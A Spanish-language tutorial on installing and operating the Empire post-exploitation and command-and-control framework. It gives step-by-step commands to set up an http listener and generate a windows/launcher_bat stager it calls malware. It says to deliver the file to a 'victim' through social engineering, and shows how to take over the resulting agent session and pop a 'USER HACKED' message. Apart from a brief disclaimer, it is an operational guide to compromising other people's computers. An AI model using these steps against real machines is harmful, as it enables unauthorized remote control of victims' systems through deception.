Tools

Empire: Un Agente Post-Explotación de PowerShell

Atención: Las herramientas o técnicas que se enseñan aquí están desarrolladas para conocimientos con fines educativos, queda bajo tu responsabilidad aceptar cualquier tipo de inconvenientes que tengas si haces un uso malintencionado.

¿Qué es Empire?

Es un framework post-explotación. Es un agente de PowerShell puro, centrado únicamente en Python con comunicaciones criptográficamente seguras con el complemento de una arquitectura flexible. Empire tiene los medios para ejecutar agentes de PowerShell sin el requisito de PowerShell.exe. Puede emplear rápidamente módulos post-explotables, que cubren una amplia gama que va desde keyloggers hasta mimikatz, etc.

Este framework es una combinación de los proyectos PowerShell Empire y Python Empire; lo que lo hace fácil de usar y conveniente. PowerShell Empire se lanzó en 2015 y Python Empire se lanzó en 2016. Es similar a Metasploit y Meterpreter. Pero como es una herramienta de comando y control, te permite controlar una PC de manera mucho más eficiente.

Instalación

Puedes descargar Empire desde aquí. Clona el comando desde el hipervínculo proporcionado para GitHub o simplemente usa clone.

Usa el siguiente comando para descargarlo:

git clone https://github.com/EmpireProject/Empire.git

Una vez que se inicia y completa la descarga, sigue los pasos que se detallan a continuación para instalarlo:

cd Empire/
ls
cd setup/
ls
./install.sh

Espera a que termine la instalación. Esto puede tardar unos segundos. Te pedirá una contraseña. Colocar las que ustedes deseen.

¿Cómo usar?

Una vez que la instalación haya terminado, retrocede un directorio y ejecuta empire usando ./empire.

./empire

Use el comando help ya que abre todas las opciones esenciales requeridas inicialmente.

De acuerdo con el flujo de trabajo, primero, tenemos que crear un oyente en nuestra máquina local. Escribe el siguiente comando:

listeners

Después de ejecutar el comando anterior, dirá que “no listeners are currently active””, pero no te preocupes, ahora estamos en la interfaz del oyente. Así que en esta interfaz de oyente, escribe:

uselistener <tab> <tab>

El comando anterior mostrará una lista de todos los oyentes que se pueden usar, como dbxhttphttp_com, etc. El oyente más popular y de uso común es http y usaremos el mismo en nuestra práctica. Para ese tipo:

uselistener http

Este comando crea una escucha en el puerto local 80. Si el puerto 80 ya está ocupado por un servicio como Apache, asegúrate de detener ese servicio, ya que esta escucha de http solo funcionará en el puerto 80. Ahora para ver todas las configuraciones que debes proporcionar en este tipo de oyente, escribe:

info

Como puedes ver en la imagen, hay una variedad de configuraciones que puedes usar para modificar o personalizar tu listener. Intentemos cambiar el nombre de nuestro oyente ya que ayuda a recordar a todos los oyentes que están activados; si se activan en masa. Así que para esto, escribe..:

set Name [nombre]

El comando anterior cambiará el nombre de los oyentes de http a [nombre].

Por lo general, este oyente toma automáticamente la IP del host local pero, por si acaso, puede susar el siguiente comando para configurar tu IP:

set Host [IP_Local]
execute

El comando de arriba ejecutará al oyente. Luego regresa y usa el PowerShell listener como se muestra en la imagen.

Ahora escribe back para regresar desde la interfaz del oyente para que podamos ejecutar nuestros módulos. Usa el siguiente comando para ver todos los módulos que proporciona el empire:

usestager <tabt> <tab>

Como se puede ver en la imagen de abajo, hay muchos módulos para Windows e iOS junto con algunos múltiples módulos que se pueden usar en cualquier plataforma. Usaremos launcher_batpara crear malware y explotar la PC de nuestras víctimas en este tutorial. Entonces, usamos este tipo:

usestager windows/launcher_bat

Este archivo debe ser enviado a la víctima por cualquier método de Ingeniería Social:

Luego, vuelva a escribir info para ver todas las configuraciones requeridas por el exploit. Después de examinar verás que solo necesitamos proporcionarle un oyente. Por lo tanto, escribe lo siguiente:

set Listener [nombre]
execute

Los dos comandos anteriores ejecutarán nuestro exploit después de configurar el listener pruebay crear /tmp/launcher.bat. Usa el servidor de Python para ejecutar este archivo en la PC de las víctimas. Como el archivo se ejecutará, tendrás una sesión. Para comprobar tu tipo de sesión, escribe:

agents

Con el comando anterior, puedes ver que tienes una sesión activada. Puedes cambiar el nombre de tu sesión ya que el nombre dado de manera predeterminada es bastante complicado y difícil de recordar. Para ello escribe:

rename V1CBMSEN nuevoNombre

Usa lo siguiente para acceder a la sesión:

interact nuevoNombre

Anteriormente se mostraba la demostración básica de empire y sus diferentes términos utilizados y cómo usarlos. También hay otro término, es decir, usemodule. Por último, veamos cómo usarlo.

usemodule <tab> <tab>

El comando te mostrará todos los módulos disponibles y listos para usar, como se muestra en la siguiente imagen:

Puedes usar para que muestre una ventana de alertas con la siguiente línea, el resto ya depende que tu pongas en practica los demás comandos

usemodule trollsploit/message
set MsgText USUARIO HACKEADO :D
execute

Fuente de referencia: Ehcgroup